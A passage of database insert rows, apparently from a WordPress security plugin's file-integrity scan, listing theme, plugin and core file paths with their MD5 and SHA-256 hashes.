(0x9043815e6589d9c01f2836ffcc2f0b8d, 'wp-content/themes/Impreza/framework/templates/elements/socials.php', 0, 0x15a40b4aaee90c2abf0e8114c3d65576, 0x15a40b4aaee90c2abf0e8114c3d65576, 0xf0d0d60659099e5039fb557a3b73f8a5ca022f98910bc78f9844c11b440c594f, '', 0, '?'),
(0x90541a42c6bac92a77e5afa97397e6f2, 'wp-content/plugins/js_composer/include/classes/core/class-vc-modifications.php', 0, 0x941642ca95d7280da4155e7aeea4b8f5, 0x941642ca95d7280da4155e7aeea4b8f5, 0x47e1f84a7ba693e040a064adb1ce15bb7aa292b6e546e1705000e54e44410fb6, '', 0, '?'),
(0x9060d84087aff0fcd7da590f45ee2104, 'wp-includes/Requests/Transport/cURL.php', 1, 0x00000000000000000000000000000000, 0x0ee4801d08da383712136160435ae0d1, 0x6849af9db717a920783c1d9d87aefea8839d2595db6a0369b0d5c207a6981e24, '', 0, '?'),
(0x906b2d279719f6cfb7963076b7bb15d3, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_hearing_24px.svg', 0, 0x7bdc7b97e27ca06f850e999914173761, 0x7bdc7b97e27ca06f850e999914173761, 0x1846e0fc93e87c49cc7d8aec6e1fc7dd1ff6d161308fd035f02515afbca6fc46, '', 0, '?'),
(0x906e5de47ce8081cbd7b20ecf5fa5157, 'wp-content/plugins/revslider/admin/assets/index.php', 0, 0x03efe17b1c4a21753f7d07ee17e77395, 0x03efe17b1c4a21753f7d07ee17e77395, 0x4175cc83b59cc460fc3989377d628e3e4d48ea0ec302ed4a4868e5fbce7c466a, '', 0, '?'),
(0x9073c667c63b3453dcc866d9473a076f, 'wp-content/plugins/js_composer/assets/lib/vc_tabs/vc-tabs.min.js', 0, 0xf52c61edc0ac887e8d3ca8d80f491e6e, 0xf52c61edc0ac887e8d3ca8d80f491e6e, 0xc6922de30ec17a125511b7dfc3ad87c3899adcceef516a79383a06e8c22c06e0, '', 0, '?'),
(0x907ed1d64a64f597f0568139818d1fc5, 'wp-content/themes/Impreza/functions/migrations/us_migration_3_1.php', 0, 0xebb66e4d24f17c741d86d2d2061566db, 0xebb66e4d24f17c741d86d2d2061566db, 0x3fb250f1efe6a81fbca02494b9cdd40b63fc45eacb3d11b5ec4e0ee7c3505f7d, '', 0, '?'),
(0x90a755cc9b092743d4bbf1bacfdaab1a, 'wp-includes/images/admin-bar-sprite.png', 1, 0x00000000000000000000000000000000, 0x53cf11a41f973a80570e0ecac5d3fe5e, 0xae04f4724e21fa60564f18b463abe34b0494c4766916d5807b466e1aa3c16c65, '', 0, '?'),
(0x90a93486f823d5b0a81c7def8b84afa3, 'wp-content/plugins/wordfence/modules/login-security/views/manage/code.php', 1, 0x00000000000000000000000000000000, 0x9e2f16d7440d96ef6d62200779915fba, 0xc124d12b97eb3bee66377b4f2f95acecb9de11ae97ca18b8046784700b7e970e, '', 0, '?'),
(0x90c122ea5a3000d8bf6585d4a670df1c, 'wp-admin/css/admin-menu.css', 1, 0x00000000000000000000000000000000, 0x8f492790e0bd47664cfc1267d3e4317f, 0x2e1c2c3546629a5227dc069afdd0529cc0a451d15ebf03c332864903285e5f26, '', 0, '?'),
(0x90dcfebcac2238598e8e023734b74f3c, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Util.php', 1, 0x00000000000000000000000000000000, 0x6469b24244f54af21088af44a535c34f, 0x4eab618715ba96698119151b42cff18dcd0d08f8c6414f5db6aca940e150b5e5, '', 0, '?'),
(0x90ddf2ae10961978385b01213e10f158, 'wp-admin/includes/class-wp-users-list-table.php', 1, 0x00000000000000000000000000000000, 0xbc75b872380b1e7b8763be15b9c924fc, 0xfe7e34305a1982a68861f1159d34010ea44d796d5db2b6e8bc598ac6336066f1, '', 0, '?'),
(0x90dfbe359e3d301e4e6109c92324daf0, 'wp-content/plugins/revslider/admin/assets/imports/fullscreen-button/index.php', 0, 0xd41d8cd98f00b204e9800998ecf8427e, 0xd41d8cd98f00b204e9800998ecf8427e, 0xe3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855, '', 0, '?'),
(0x90e14f47fc0ecf8faee0076a44fe037d, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_hourglass_full_24px.svg', 0, 0x8bb8d9d92afa82137b84df36866415b7, 0x8bb8d9d92afa82137b84df36866415b7, 0xc92d4bbc43d46c8d855e2c33ee4e04436a935c980b2687346787c371d59d8fe2, '', 0, '?'),
(0x90fe81b87fa7a97a798253e68d55fdd5, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/rocket.svg', 0, 0xf0ce7d625b102cdbb0efa5a3cbe60630, 0xf0ce7d625b102cdbb0efa5a3cbe60630, 0x794d09c7a9c88175ba05fad4c1259e10efbe5128c1913e15ad7e66fd6307dffd, '', 0, '?'),
(0x90fee3fb93bc044a0f93f813148cd315, 'wp-content/plugins/js_composer/include/params/vc_grid_item/shortcodes.php', 0, 0x166b5dd4a6d339ae25aae6e5adb4b07a, 0x166b5dd4a6d339ae25aae6e5adb4b07a, 0x4782155e03764df2b2f57466a4484939c365e4723b18e008d89ae235d21b3cee, '', 0, '?'),
(0x9112e37565817f7b58a131ec82d1d20b, 'wp-includes/sodium_compat/src/Core32/Poly1305/State.php', 1, 0x00000000000000000000000000000000, 0xb4b644fa35dbc824c3bd0a09e0277130, 0x08135c868922c8d4af2d0d1436deeb65d44eb4490644e6ba7a42e60d0f00fcf7, '', 0, '?'),
(0x911f31aec98386aff9d9a2401782403a, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_grocery_store_24px.svg', 0, 0xd57c46cad0c8359df14356f7dc3ae5d1, 0xd57c46cad0c8359df14356f7dc3ae5d1, 0xc413b2d49e65e63b6e548186478fa7ec924b6bf8a5600ea71dc6fddf8836cd38, '', 0, '?'),
(0x912fab061204d2301629adba9c1ae6ab, 'wp-content/plugins/wordfence/views/scanner/issue-database.php', 1, 0x00000000000000000000000000000000, 0x5b9bfe0c200a86526fa24e0e37d6117c, 0x7e9d87e29d836764b226775b9575bfac0eaaa1b9916f1ed918d17c741e89c17d, '', 0, '?'),
(0x9135f7609ea30255c9b134a9c446b4ce, 'wp-content/plugins/wordfence/js/jquery.dataTables.min.1579191227.js', 1, 0x00000000000000000000000000000000, 0x0e123c5cc2f4201c8305cd9507b768a8, 0x76e6416f3bfcef8ca47544cc330e249b5742393505eba35f229db4f4b120b318, '', 0, '?'),
(0x91408771b0cf47cd2d24a2a997ea7ce8, 'wp-content/plugins/wordfence/modules/login-security/classes/controller/db.php', 1, 0x00000000000000000000000000000000, 0xb1e9cbe8dd6750ca8bbed9690fd5e95b, 0xb644654ab01ac26678629c09781f2750f3abb713143a99939d03acf4c082a655, '', 0, '?'),
(0x9145259f6a36644913d4fc81b4844042, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_sms_24px.svg', 0, 0xeaaf52be351fa5c5fd21362f21a8b62b, 0xeaaf52be351fa5c5fd21362f21a8b62b, 0x5c738b0a6df93b7b04817328aac7ccdddac40a8c43892845b038fea09c272b0a, '', 0, '?'),
(0x91531896c6f70c8a4b4b321d1369c988, 'wp-includes/comment.php', 1, 0x00000000000000000000000000000000, 0x0efe360cb03286969cd29153968e9fb9, 0xd701bcdaa54c73e5b67add17fef65f8171b52d1362edfd048b55a3944eeab1da, '', 0, '?'),
(0x91637e5931f31ce7d30ebfb39840db67, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-gitem-animated-block.php', 0, 0xf29eff8a6b0d70ab8243118acd4327f4, 0xf29eff8a6b0d70ab8243118acd4327f4, 0xbe095566f45daeb6e0b47f5ca3115d08d7dde6ae106d28f7dc41483aa551f8cf, '', 0, '?'),
(0x9169128a1726389e1ed1248a5be03f3f, 'wp-content/plugins/js_composer/include/autoload/vendors/mqtranslate.php', 0, 0x0790bfa149952bfb48f2d775d38fe63b, 0x0790bfa149952bfb48f2d775d38fe63b, 0xc8c7c764f58519c41b665bcb8dd4dec7a86721a662ab36b2a55aa0083224d6cb, '', 0, '?'),
(0x9178c35f2c5b98d40e3589891e0186aa, 'wp-content/plugins/wordfence/images/sort_asc_disabled.png', 1, 0x00000000000000000000000000000000, 0xd7dc10c78f23615d328581aebcd805eb, 0x9f8bb2fb5b386cdb59f4a2ece519636b6cfedb09998d75234b56d9c6100c896e, '', 0, '?'),
(0x9179df678bed1f7a6155228309584b47, 'wp-includes/js/hoverIntent.js', 1, 0x00000000000000000000000000000000, 0xc0d37a2f50f79db4eaaeb10c3c170990, 0x74bfc26e6554522fee3737fd05401ad2a7309b67a811c78cf4e792fbe8a2eff8, '', 0, '?'),
(0x91a455eb9451c89584506a94acc1cede, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_bug_report_24px.svg', 0, 0xef38a7b962993dda579668714dab6892, 0xef38a7b962993dda579668714dab6892, 0x7a1a6cfb2eddb95467959b75116ee406a666d0c052b7638696075c1183a6de56, '', 0, '?'),
(0x91bc6f5932063d081db4d2411dd82a3c, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_more_vert_36px.svg', 0, 0xeef2f6f288ef9136d13dca5bb7fd99d6, 0xeef2f6f288ef9136d13dca5bb7fd99d6, 0x37c28ee8df68d52b5e6a942a0abd28c60a5c1f20feebf79884472a117043d150, '', 0, '?'),
(0x91c88243e899a7d44d2d92279f030472, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-revolution-slider.svg', 0, 0x9d664e0dcbf59d7e0f93a5ff16913941, 0x9d664e0dcbf59d7e0f93a5ff16913941, 0xcfac333475b4a8b164dad4c6ca189873d5989719f9c0fa516e60129449f2a140, '', 0, '?'),
(0x91dc0e9d4e545a74bf6f0d9625b2af46, 'wp-content/plugins/wordfence/views/scanner/options-group-general.php', 1, 0x00000000000000000000000000000000, 0xff965ff1f9f197d58e373b97e3ce5f5f, 0x143a576e251c1d944a7aa157370126a04ec9e4e3a0483c8e22cbf9644b6518fe, '', 0, '?'),
(0x91e84225c37e7d92780903b1b5ed1250, 'wp-content/plugins/js_composer/config/deprecated/shortcode-vc-button2.php', 0, 0xa3dfc0e6debc28e9f2fae3e875fd4935, 0xa3dfc0e6debc28e9f2fae3e875fd4935, 0x40d366372eb43481809e048eaae6f28f3674bd83c5e4ce009e3b54049915e2a5, '', 0, '?'),
(0x91f9a32c34f67a22fbdf66fcbe1b5196, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_play_circle_filled_24px.svg', 0, 0xb67ee8cc43cea5f03e5dc8a12a37b00e, 0xb67ee8cc43cea5f03e5dc8a12a37b00e, 0xac5fed3897fd670b49c11c874f42f4aab73d3c4dbc1ff69e6500eb6fb75eb248, '', 0, '?'),
(0x9207616e5ab4889dc3005250c4fa4818, 'wp-content/plugins/js_composer/include/classes/vendors/plugins/class-vc-vendor-yoast_seo.php', 0, 0xca8c0fa45075b9a2e71304400a4a8383, 0xca8c0fa45075b9a2e71304400a4a8383, 0x7fe7cf6ac33269251eafbd02fc646a8c0276161df8d42e550dfd720154592177, '', 0, '?'),
(0x920f220280de2ba53c40fe5357ef79ba, 'wp-content/plugins/Ultimate_VC_Addons/assets/min-js/jquery.min.js', 0, 0xa1d2543d9ee412148453f39cf05cfe0d, 0xa1d2543d9ee412148453f39cf05cfe0d, 0xec8c52e3faf4da31c367d17b2442d89b93c53f12b00c1c7b6415cb5b1d05f010, '', 0, '?'),
(0x922f16bb17c998fc5df45ea4575c8371, 'wp-includes/css/wp-embed-template.css', 1, 0x00000000000000000000000000000000, 0x6bd3bd8591e2514b36cab474effcbbe4, 0x62e4c8e083a162f9e8962cc6a21e0a2f4d14d76aac44c80454110dcd064ed819, '', 0, '?'),
(0x926383c5cdd436d7992bf6fe8ff0a4a4, 'wp-content/plugins/js_composer/include/classes/vendors/plugins/class-vc-vendor-mqtranslate.php', 0, 0x7b41e52e5f2221a7fb085bfdc6803785, 0x7b41e52e5f2221a7fb085bfdc6803785, 0x5b6d719fbe291e8198a2f62e453aa0e5b05f533d9661aa06f6ed527f61b2c553, '', 0, '?'),
(0x9266b4d9327c62073592d7d6a4f4cf1c, 'wp-content/plugins/revslider/revslider.php', 0, 0x8d678f25b6443bdd5a5d30c015702dbe, 0x8d678f25b6443bdd5a5d30c015702dbe, 0x57f053b652d8436dc71c588608d07e90db78d01563bfdf9ab7247f4914eb3510, '', 0, '?'),
(0x926bd576d1cdcd123426467589112c0f, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_keyboard_arrow_up_24px.svg', 0, 0x1f5dc0c5f607ec3bf9e3089febd9c373, 0x1f5dc0c5f607ec3bf9e3089febd9c373, 0x25e6368ef78fa8634c7d1756b03669f565ff6dad578a596f571f4c4a53fee646, '', 0, '?'),
(0x9273e64ccab583f31d660b433d3c7351, 'wp-content/plugins/Ultimate_VC_Addons/assets/js/content-box.js', 0, 0xdd83c748b75b9bf5e78c93b41da9e9a6, 0xdd83c748b75b9bf5e78c93b41da9e9a6, 0xe9a18860266d02383a6695c8d75c608bbe8017954167e30af6a1e95f2b83a0ac, '', 0, '?'),
(0x92767b4cf64a6cc58d80597ad560b028, 'wp-includes/js/thickbox/thickbox.css', 1, 0x00000000000000000000000000000000, 0x69d6aa1f5bafc0d02da2d4470496ea12, 0xdb19311df5e10d10a3d4634599af5e6541bb05944234ba780c7a1fab8f1b955b, '', 0, '?'),
(0x928e37d68633697b8ed764f19232acd5, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_statusbar_1_bar_26x24px.svg', 0, 0x5d1ef474e8d74ee9b2c377c1a2e22bf3, 0x5d1ef474e8d74ee9b2c377c1a2e22bf3, 0xa669cadddaaed12d1067ea66408d8c37a8fd21fe7f57a9b37e9a5aba0fcc802d, '', 0, '?'),
(0x92b128b3bc4e4c8d3b080982cec01903, 'wp-includes/js/dist/api-fetch.min.js', 1, 0x00000000000000000000000000000000, 0xe52101f853577a9ec8e7cb8137e33640, 0xeffb6f9ae65c31ce6a2e86f25bf05454ba3aacb3c246b88a5c8a8b2fb0ac8239, '', 0, '?'),
(0x92d1bce694ba3e6662058b15414aff4a, 'wp-content/plugins/revslider/admin/assets/imports/finedining/index.php', 0, 0xd41d8cd98f00b204e9800998ecf8427e, 0xd41d8cd98f00b204e9800998ecf8427e, 0xe3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855, '', 0, '?'),
(0x92e2c5ed87b4c114c1dc7586fd348336, 'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/HttpException.php', 1, 0x00000000000000000000000000000000, 0xc86ccb666bb3ea3c19fdf7070d0ac0cb, 0x5221d64f5d7092490ae1cb5c85c55650cc3911873dc104fe21f2133f8f1dd1f0, '', 0, '?'),
(0x92f3a605519ac32246a112bc49e3dca2, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_looks_4_24px.svg', 0, 0x61937d78b7e8dc3a82f6ecd44ffba340, 0x61937d78b7e8dc3a82f6ecd44ffba340, 0x353e389b07e295839260b6864d6a287ff161d5f19068506ae2f6bcc6730e5d74, '', 0, '?'),
(0x931d58e88156d7984f7c387d069a8082, 'wp-includes/theme.php', 1, 0x00000000000000000000000000000000, 0xba06289d59bafd6986a693f440ae27fd, 0xdd77274aa0823afedb86ad3af4cb62219387bb0460732b61218ef65325b59a94, '', 0, '?'),
(0x93219c8893d1ed8c736b0dcfceb89d27, 'wp-content/plugins/revslider/admin/assets/js/codemirror/util/formatting.js', 0, 0x6a8b25e8a084135c83d90b77258e9c64, 0x6a8b25e8a084135c83d90b77258e9c64, 0xc9435317c664f96dd56e89e574965732986f482fd9d3e96f6cd6f956efc92334, '', 0, '?'),
(0x9325deb993d1cb0baedcd6510d9dad3d, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_gps_off_24px.svg', 0, 0x25c5af75b4c5938900c78c8a0cbf9289, 0x25c5af75b4c5938900c78c8a0cbf9289, 0x53311b69a7d9054bd1a16e4bd667ed2de6740fd5233c123ac019d5b4f9cc2de5, '', 0, '?'),
(0x933e7312eb3a103182601e2d74fa7605, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_border_inner_24px.svg', 0, 0x3cdf63ac55246f01de42828b44e367c2, 0x3cdf63ac55246f01de42828b44e367c2, 0x65fed053d107a9ee98f2d0c2ef4e8e7602ab95c4f608c5a7db4cbff8df6fb776, '', 0, '?'),
(0x9342dd482a12046d7a97cd4e3833fcee, 'wp-admin/css/edit-rtl.min.css', 1, 0x00000000000000000000000000000000, 0x2458095adb086c724eaa5b71e9b7e6be, 0x0105ddd0c178a49cd725a761eeacd6bbb8d2da9a51ec471d60eb95dc16fa65fe, '', 0, '?'),
(0x9347bc1d4e325cdd3601f0c97dedfbe4, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-faq-toggle.svg', 0, 0xada1e1953cb47feb6341181b64990b45, 0xada1e1953cb47feb6341181b64990b45, 0xc3ca843f4f777083f3076ed32ebfaf3207ed5a6452ef4aefaf5c893c38d61078, '', 0, '?'),
(0x93567dbb50949cb16d952faf7c492ad9, 'wp-includes/js/customize-loader.js', 1, 0x00000000000000000000000000000000, 0x43b25764a6f643073ba0e4152c6365a6, 0x517ea66e6aabe07c0c49868069cb7ebbd5ea723334620f45c720e31afebf0b3c, '', 0, '?'),
(0x93614db326ded5a93b3f17e25f36d3fb, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_query_builder_24px.svg', 0, 0x9c0abe38bf6c7dae2bfc514783d0ff20, 0x9c0abe38bf6c7dae2bfc514783d0ff20, 0xa37e3260f5c9015b940cc3a9c0f9590652cc3acbd997cead3000232473b3f428, '', 0, '?'),
(0x936c81fc1b743a7b302b37e0394314fd, 'wp-includes/sodium_compat/src/Core/HSalsa20.php', 1, 0x00000000000000000000000000000000, 0xf1d3480c782bda30371cb89960ae7df4, 0x40717ab4146ad81849af99e1e6200044bc61b60257bbac366ecd7b8aa3b679df, '', 0, '?'),
(0x93882e8f9976382d7f724ac595ed7151, 'wp-includes/js/wp-auth-check.js', 1, 0x00000000000000000000000000000000, 0xd92e8027e527bd17fad278c48962d397, 0x7457e811702eb710843f08fc9b849bb85da230f4a20485a0e8ae9f2b706f1129, '', 0, '?'),
(0x93ab14378bd64523be77c5a76aafb2b2, 'wp-admin/includes/image-edit.php', 1, 0x00000000000000000000000000000000, 0x4622f71e5b9705b1d417390a0af57fe7, 0x729ad58118a15a2028aea95d891908110d96ad764c471d55d00648850b760830, '', 0, '?'),
(0x93acbe095ff2ad3a194f6967d4ec16ae, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/presentation.svg', 0, 0xc76c0ee6c60db62c5f991ba9be06c887, 0xc76c0ee6c60db62c5f991ba9be06c887, 0xc5cfb9db1d8a192a7d0f6430bd47ffd81a6efa6f23be6046bf41a6395fb36522, '', 0, '?'),
(0x93ae8458fa512fcd4c8a5c59c410fdc7, 'wp-content/plugins/js_composer/include/autoload/vendors/ninja_forms.php', 0, 0x6eec499495c927dd14c582bd41d6fb0d, 0x6eec499495c927dd14c582bd41d6fb0d, 0x09f7abe017046a8669480390b038cf607a88aaddd1eb0f1aa50131a7275af18a, '', 0, '?'),
(0x93af54d2a29329e3c69f3d7b5a1ee363, 'wp-content/themes/Impreza/framework/templates/elements/post_comments.php', 0, 0xeed358af97ad45cbb77181ff66999cc0, 0xeed358af97ad45cbb77181ff66999cc0, 0xf631ce24d093596e048887550cc55c6b1b589425fb6d7ab53ddccac32d8d5d3a, '', 0, '?'),
(0x93babcd2c16271c02fa4d9db4601a46b, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php', 1, 0x00000000000000000000000000000000, 0xdff0aaad3787f5c2a40dac46c4dd0c67, 0x9e6e7f9256278c56b1fbbba456eeb27f29467c2ae1919d0c1732884ee08fd77a, '', 0, '?'),
(0x93c6c5d2ab50e69e4e227a983d34cd4d, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-gitem-post-title.php', 0, 0xf84d158f2650d40111e5787ec8026375, 0xf84d158f2650d40111e5787ec8026375, 0x0bf7f15c5a57f03e2d526e1b2f505f2f832b0b1a7e139755b6ea4e9f9f6c2dda, '', 0, '?'),
(0x93cc64d271f16d3abefd3894771e1f32, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_camera_rear_24px.svg', 0, 0x9b9a0b7cbf7502bc55414ba1c4590ec1, 0x9b9a0b7cbf7502bc55414ba1c4590ec1, 0xe629bbf94e0613bf38946a73a3d99f6a7a764e3da5353443738171201d3e9c04, '', 0, '?'),
(0x93ed5d3e05d58c57256ec6c3e936b6bf, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/preson-chart03.svg', 0, 0xf4ee235742f902359f8a54d192f75e0f, 0xf4ee235742f902359f8a54d192f75e0f, 0xf12064d3d2a4272cf5e965774109d6d3da910cadf2199b3e85972b3dbce219f2, '', 0, '?'),
(0x93f0ab760feeadf9c30e7cdf2df0c917, 'wp-includes/js/tinymce/plugins/tabfocus/plugin.min.js', 1, 0x00000000000000000000000000000000, 0xc221f3fd3ce085bb175deabbd1720788, 0x158dc9178570165b06bcc8d0f60e14afd94c3703461e85a37ccb965a429c528a, '', 0, '?'),
(0x94006070a40df714d3c07454bfdd2e62, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_monochrome_photos_24px.svg', 0, 0x88ec63eb95c8fcce843e03f4bbb3ecb8, 0x88ec63eb95c8fcce843e03f4bbb3ecb8, 0x44e2ebeaf1c3a19e71d7b7c50bad8f3cda0874b4a1122dce8b2fe92aadab7210, '', 0, '?'),
(0x942148554e26ef228ba8d30e8c7af7f4, 'wp-admin/css/widgets.css', 1, 0x00000000000000000000000000000000, 0x2b91a746ea29f9a8ba3c2c0ce4c92259, 0x1c335d44981f07947085cc929f89a01bc0f2f232550160f2229954bbcfea1845, '', 0, '?'),
(0x9439f1a7b2a7a95499248e49fbc26777, 'wp-content/themes/Impreza/framework/plugins-support/wpml.php', 0, 0x43317ee0f556874e25cb175e9f329c29, 0x43317ee0f556874e25cb175e9f329c29, 0xebaef805dec89f941074c1d5b0b2b368cf84890884a142bbf65c7c96ce399801, '', 0, '?'),
(0x9460d76365e4d4732ae74e3202805087, 'wp-content/themes/Impreza/functions/migrations/us_migration_5_1.php', 0, 0x1287fb08eb989439ff7f131151c2b5c3, 0x1287fb08eb989439ff7f131151c2b5c3, 0x44c4cd9bb0c6c2ea43b3d7bd73b0cf97d2a250147ebf3df7a74004b303343148, '', 0, '?'),
(0x9461b17455da71b65e21e430c6a36c81, 'wp-includes/post-formats.php', 1, 0x00000000000000000000000000000000, 0xfd05c89b0a36412445d388e41a0ba31d, 0xbe32d59ab0a0b9a5d73c811eeb9fd5b989c140be00f51dd90b1ae16db7e2f2b7, '', 0, '?'),
(0x946b8ba5977adfa3f3d4ecd7626fd352, 'wp-admin/post-new.php', 1, 0x00000000000000000000000000000000, 0x84d0a6a3f0b624ac4c68ab7bafa23119, 0x7725d72ffcd1dc30e3756ff507f41b79f88760639d8fc802341e91c4b20a1cd5, '', 0, '?'),
(0x9473166786cd3d76a859f543e6d70100, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_stop_24px.svg', 0, 0x292a58fac6b30b3c9d4306112f70ef01, 0x292a58fac6b30b3c9d4306112f70ef01, 0xf7c3fd68c06bfac4f1006125e8e51f86cdba1f7d5cc6e7ccaa0f4d513940f4fa, '', 0, '?'),
(0x94764fafd623e84aa54eefd42bec8181, 'wp-content/plugins/wordfence/css/images/ui-icons_ffffff_256x240.png', 1, 0x00000000000000000000000000000000, 0x41612b0f4a034424f8321c9f824a94da, 0xac2f233f54ef8669054f4c7976a6ed751b9a98544b94b0a9c9a4bdb75cd8bbf5, '', 0, '?'),
(0x947fdbc875f5607cf52f05eb400a8e79, 'wp-content/plugins/wordfence/css/wordfenceBox.1579191227.css', 1, 0x00000000000000000000000000000000, 0x1b43bf90da5704599c7ee4489c23ec5d, 0x9a72ba8eb5a87bb5db1a498935994f319487a451dcddd38713a8a3d2f743dfef, '', 0, '?'),
(0x948680a05cc6273dc853252562532824, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_dvr_24px.svg', 0, 0x8a50fd6684c85ff8d63d11964672d36f, 0x8a50fd6684c85ff8d63d11964672d36f, 0x0f22a69e84b8163e13624d02e7f80484bc8cc4a5b4d2155de9aeda83539b2616, '', 0, '?'),
(0x94984086bb7bf74aa4e1ab35e4b7b458, 'wp-includes/js/tinymce/skins/wordpress/images/playlist-audio.png', 1, 0x00000000000000000000000000000000, 0x552cfb3a29ac01a0d88b0422c5517159, 0x22e4021c1d4f6ffbdb8889e1c53cf6806f45532d4d4fc3b7e597594e802189bc, '', 0, '?'),
(0x94b1a6ae4cd8e21736090cd8c0e8d7b3, 'wp-includes/ID3/module.audio.ac3.php', 1, 0x00000000000000000000000000000000, 0xb3e8c41aad74f79bfcac59f24ccedd6d, 0xe1d2b7a2889750358abed084f95e6ebe6298dd1cb998a6d28e1e281c49b0cd77, '', 0, '?'),
(0x94c6e18f0a41c81551e0e4b97c74d660, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_list_bulleted_24px.svg', 0, 0xd9b73d7f1c2fd6bcc6a3991843e1838b, 0xd9b73d7f1c2fd6bcc6a3991843e1838b, 0xebfa23dea46396838c91688fb04d6e3ac1b118a0559c77e3008326024eda2116, '', 0, '?'),
(0x94c91e54b2a256a8edf4aa935c989705, 'wp-admin/import.php', 1, 0x00000000000000000000000000000000, 0x7f15d94a5ace4dcd6b73da2373b0cba8, 0x06f60315036a160f167cd392a953268cfc5055cc30f88348e2e2e5d6033f4f28, '', 0, '?'),
(0x94d0b4ec0375d73e47b8a15b650c9d32, 'wp-content/themes/Impreza/framework/plugins-support/js_composer/map/us_iconbox.php', 0, 0xf2446c865c481e7be5bd855f88e95914, 0xf2446c865c481e7be5bd855f88e95914, 0x174b2ababd87e7d75cde8717ad6b46e1a9b7164302f320be26e5ae560e744644, '', 0, '?'),
(0x94d599b25db3c4380e40fae2b4d6288e, 'wp-content/plugins/revslider/admin/assets/js/codemirror/util/closetag.js', 0, 0xa379e22ef4f9da609b7a04503e4d1b75, 0xa379e22ef4f9da609b7a04503e4d1b75, 0x6521dec5e0160c459f0c0ef6d4dc644e092d9ac897b24694c69d0ecc9409c522, '', 0, '?'),
(0x94d7e8ff4e74bb194bf4a35505f285ef, 'wp-includes/Requests/Exception/HTTP/407.php', 1, 0x00000000000000000000000000000000, 0xc2c817e9f5d8768bbde4d66a26e6c6b5, 0x3e1ad4d7db5dc69a9642cc8f587692d8b063af9af1b9d32e4e32c24ed2b9d0af, '', 0, '?'),
(0x94dc74faf07430d1682b73639d0888d1, 'wp-content/themes/Impreza/framework/templates/elements/cart.php', 0, 0x16f4dbe6febbe41cc62f5c204b752c1e, 0x16f4dbe6febbe41cc62f5c204b752c1e, 0x3e935bba8fd28d8256300d6b423037a4cecf614085ae485ec3ed664bfab000eb, '', 0, '?'),
(0x94dcb55b0fd2b26d258936f253383a44, 'wp-includes/images/toggle-arrow.png', 1, 0x00000000000000000000000000000000, 0xdcdfce879761fde6123beb64cecf2af2, 0x5b621aa91c058ec53beb5dac66c930a0b206e673047c3a1fbf1dac861cd4f325, '', 0, '?'),
(0x94dfb8416f69441c752487f5b237b9da, 'wp-content/themes/Impreza/functions/migrations/us_migration_4_6.php', 0, 0xda58fb808585835497a8788e618b95b2, 0xda58fb808585835497a8788e618b95b2, 0x6ac6979e423271372aa06610ec7c94ce50d83c3321ac23e9656a8ccddfb4cec4, '', 0, '?'),
(0x94f4a89621deaca9c4dfb3c20cc1ab70, 'wp-includes/images/crystal/default.png', 1, 0x00000000000000000000000000000000, 0x41f23e292a2fbedc21ecae2d04f29bba, 0x8088886e248ba8835fad751409128624513310cd0c9645bbd78f72a17c4a6d97, '', 0, '?'),
(0x94fec973a61eec5db743154e9504ab19, 'wp-content/themes/Impreza/framework/templates/elements/post_custom_field.php', 0, 0xfacd110685d5ad11e1efb2151dea8248, 0xfacd110685d5ad11e1efb2151dea8248, 0xe5a7bd5b448ace04c295e9db1434e4ac0320b3169c2cfda41d0f2e8fd48cc31c, '', 0, '?'),
(0x950485b84909329f0852fd4e6a59ffe3, 'wp-includes/sodium_compat/src/Core32/Curve25519/Fe.php', 1, 0x00000000000000000000000000000000, 0x93f701bb01e99676df0d732a935c810e, 0xf8cd4fb2055a3dc13c9a3353f174cf51900887aef25f97753b149109166d3818, '', 0, '?'),
(0x950526da4dfb580897ff5714e7c44fb2, 'wp-includes/error-protection.php', 1, 0x00000000000000000000000000000000, 0x117d00bff6aea4baeb3bbe8d4e774a4f, 0x8a0c290b102b7c01aa10eef77d7dd8675c17c5d23dcb5ee74e241bf7f0f25134, '', 0, '?'),
(0x950fd2863dcf0d6b59e3107a94fc9ec4, 'wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.min.1579191227.css', 1, 0x00000000000000000000000000000000, 0xbe6cff2eb4147f9a28eb4b917051d9f0, 0xb3d98d240c72623d70cf680eb978cb4ba3f9355d38c751fea7985289af6a6e34, '', 0, '?'),
(0x953603bd282bdeda5dac5402356ee982, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-zigzag.php', 0, 0xbdc913c17b0c6d5f0f43d8015972b39b, 0xbdc913c17b0c6d5f0f43d8015972b39b, 0x6f197d9d2894536366b0235b66cb7cfb7b66cd584ed359978558af719edf5b8f, '', 0, '?'),
